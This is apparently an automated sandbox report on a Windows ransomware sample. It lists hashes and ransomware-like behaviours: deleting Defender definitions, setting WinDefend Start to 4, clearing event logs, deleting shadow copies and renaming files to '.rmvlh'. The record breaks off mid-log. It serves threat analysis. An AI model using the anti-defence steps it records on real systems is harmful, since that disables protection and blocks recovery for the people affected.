Analysis
-
max time kernel
20s -
max time network
143s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 13:29
Static task
static1
Behavioral task
behavioral1
Sample
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
Resource
win10-en-20211208
General
-
Target
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
-
Size
2.6MB
-
MD5
6a998dc6f975da2f4e88849b03b34b13
-
SHA1
56f7fea05977ed3a4b1b6fed4713a56008669e4b
-
SHA256
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050
-
SHA512
8c4ade656335d3f9ca575bfb615f8cb36107bf5cbd5c47070e97a2818953062619d06dd03a911d5f4e176709273580e1d2370da6ff5cdb555ac42e1ed09a468b
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3260 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3120 bcdedit.exe 3048 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
Processes:
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exedescription ioc process File opened for modification C:\Program Files\Common Files\System\ado\adovbs.inc edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\InputPersonalization.exe.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_HAtrjrleLto0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\hijrah-config-umalqura.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD__kMAQggZMjg0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.security.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Y8rcwHMMJMc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_t002nTsWoyM0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\delete.avi edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrusash.dat edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsdeu.xml edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Hz9Q7pnT8DI0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_OlxUl-6lO_E0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveDrop32x32.gif.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_63giSdWhICc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_5qsc9VZ495w0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_NlukQsWVv2E0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_ySQX5PTCFDU0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\rtscom.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\localedata.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_7ifGsyBsf5k0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_0mD4Vhi5_700.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_x1-r5Y7ZPf80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_kMZaGAh98BA0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_AKhJYQCwcLo0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\ado\msado25.tlb edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_rsAV8NSzsHA0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Rh7QysK8WQI0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_tUspdsyBgZ80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_6HO7C4wUomk0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_GG2IwIw7AP80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_-E9K7bim78s0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_cra7ndQHUEw0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_DQSpc2yhtlQ0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\FlickLearningWizard.exe.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\management.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_wXMcF_S2EOQ0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_l9GT7ETAy0Q0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_IA66k765kn40.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_5EgAOFRnZPw0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\micaut.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ru.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_aN0h3tCUm840.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Green Bubbles.htm edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\TipRes.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\NOTICE.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_mZvAfeCuP3g0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_AV9mZ_nhJjE0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_o1DhEets4fc0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_GSMon5bW7Y00.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\ShapeCollector.exe.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_2omFtnuKAhs0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_N5il6ELhfjo0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipstr.xml edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_dz-fxIEJ84g0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_nm3JM2-ou6A0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_6B6bNlSAvns0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Ju4AU8GRM2E0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_vC3WbLcEwtQ0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Wzx_xEUbnPs0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\msinfo32.exe.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_HUbrzoMZnFE0.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_VTyJRzoLAG80.rmvlh edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 376 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exeedf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exepid process 980 powershell.exe 980 powershell.exe 980 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3236 wevtutil.exe Token: SeBackupPrivilege 3236 wevtutil.exe Token: SeSecurityPrivilege 1444 wevtutil.exe Token: SeBackupPrivilege 1444 wevtutil.exe Token: SeSecurityPrivilege 2824 wevtutil.exe Token: SeBackupPrivilege 2824 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3716 wmic.exe Token: SeSecurityPrivilege 3716 wmic.exe Token: SeTakeOwnershipPrivilege 3716 wmic.exe Token: SeLoadDriverPrivilege 3716 wmic.exe Token: SeSystemProfilePrivilege 3716 wmic.exe Token: SeSystemtimePrivilege 3716 wmic.exe Token: SeProfSingleProcessPrivilege 3716 wmic.exe Token: SeIncBasePriorityPrivilege 3716 wmic.exe Token: SeCreatePagefilePrivilege 3716 wmic.exe Token: SeBackupPrivilege 3716 wmic.exe Token: SeRestorePrivilege 3716 wmic.exe Token: SeShutdownPrivilege 3716 wmic.exe Token: SeDebugPrivilege 3716 wmic.exe Token: SeSystemEnvironmentPrivilege 3716 wmic.exe Token: SeRemoteShutdownPrivilege 3716 wmic.exe Token: SeUndockPrivilege 3716 wmic.exe Token: SeManageVolumePrivilege 3716 wmic.exe Token: 33 3716 wmic.exe Token: 34 3716 wmic.exe Token: 35 3716 wmic.exe Token: 36 3716 wmic.exe Token: SeIncreaseQuotaPrivilege 3220 wmic.exe Token: SeSecurityPrivilege 3220 wmic.exe Token: SeTakeOwnershipPrivilege 3220 wmic.exe Token: SeLoadDriverPrivilege 3220 wmic.exe Token: SeSystemProfilePrivilege 3220 wmic.exe Token: SeSystemtimePrivilege 3220 wmic.exe Token: SeProfSingleProcessPrivilege 3220 wmic.exe Token: SeIncBasePriorityPrivilege 3220 wmic.exe Token: SeCreatePagefilePrivilege 3220 wmic.exe Token: SeBackupPrivilege 3220 wmic.exe Token: SeRestorePrivilege 3220 wmic.exe Token: SeShutdownPrivilege 3220 wmic.exe Token: SeDebugPrivilege 3220 wmic.exe Token: SeSystemEnvironmentPrivilege 3220 wmic.exe Token: SeRemoteShutdownPrivilege 3220 wmic.exe Token: SeUndockPrivilege 3220 wmic.exe Token: SeManageVolumePrivilege 3220 wmic.exe Token: 33 3220 wmic.exe Token: 34 3220 wmic.exe Token: 35 3220 wmic.exe Token: 36 3220 wmic.exe Token: SeIncreaseQuotaPrivilege 3220 wmic.exe Token: SeSecurityPrivilege 3220 wmic.exe Token: SeTakeOwnershipPrivilege 3220 wmic.exe Token: SeLoadDriverPrivilege 3220 wmic.exe Token: SeSystemProfilePrivilege 3220 wmic.exe Token: SeSystemtimePrivilege 3220 wmic.exe Token: SeProfSingleProcessPrivilege 3220 wmic.exe Token: SeIncBasePriorityPrivilege 3220 wmic.exe Token: SeCreatePagefilePrivilege 3220 wmic.exe Token: SeBackupPrivilege 3220 wmic.exe Token: SeRestorePrivilege 3220 wmic.exe Token: SeShutdownPrivilege 3220 wmic.exe Token: SeDebugPrivilege 3220 wmic.exe Token: SeSystemEnvironmentPrivilege 3220 wmic.exe Token: SeRemoteShutdownPrivilege 3220 wmic.exe Token: SeUndockPrivilege 3220 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2476 wrote to memory of 3820 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 3820 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 3820 wrote to memory of 3716 3820 net.exe net1.exe PID 3820 wrote to memory of 3716 3820 net.exe net1.exe PID 2476 wrote to memory of 3736 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 3736 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 3736 wrote to memory of 3668 3736 net.exe net1.exe PID 3736 wrote to memory of 3668 3736 net.exe net1.exe PID 2476 wrote to memory of 1292 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 1292 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1292 wrote to memory of 660 1292 net.exe net1.exe PID 1292 wrote to memory of 660 1292 net.exe net1.exe PID 2476 wrote to memory of 928 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 928 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 928 wrote to memory of 2356 928 net.exe net1.exe PID 928 wrote to memory of 2356 928 net.exe net1.exe PID 2476 wrote to memory of 628 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 628 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 628 wrote to memory of 3748 628 net.exe net1.exe PID 628 wrote to memory of 3748 628 net.exe net1.exe PID 2476 wrote to memory of 1656 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 1656 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1656 wrote to memory of 2292 1656 net.exe net1.exe PID 1656 wrote to memory of 2292 1656 net.exe net1.exe PID 2476 wrote to memory of 524 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 524 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 524 wrote to memory of 3392 524 net.exe net1.exe PID 524 wrote to memory of 3392 524 net.exe net1.exe PID 2476 wrote to memory of 1416 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 1416 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 1416 wrote to memory of 1044 1416 net.exe net1.exe PID 1416 wrote to memory of 1044 1416 net.exe net1.exe PID 2476 wrote to memory of 612 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 2476 wrote to memory of 612 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe net.exe PID 612 wrote to memory of 932 612 net.exe net1.exe PID 612 wrote to memory of 932 612 net.exe net1.exe PID 2476 wrote to memory of 2648 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 2648 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 2576 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 2576 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1180 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1180 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 2672 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 2672 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 3688 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 3688 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1528 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1528 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1716 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1716 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1988 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 1988 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 3960 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 3960 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 2476 wrote to memory of 2316 2476 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe reg.exe PID 2476 wrote to memory of 2316 2476 